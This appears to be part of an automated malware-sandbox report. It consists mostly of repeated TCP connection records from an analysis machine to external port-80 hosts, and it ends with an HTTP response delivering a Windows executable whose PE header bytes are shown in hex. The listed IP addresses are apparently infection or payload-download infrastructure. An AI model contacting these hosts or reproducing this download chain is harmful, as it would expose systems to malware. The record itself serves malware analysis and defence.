                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
                Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49168
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 10:42:50 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 16 Jul 2024 19:13:36 GMTETag: "e8400-61d6224798859"Accept-Ranges: bytesContent-Length: 951296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 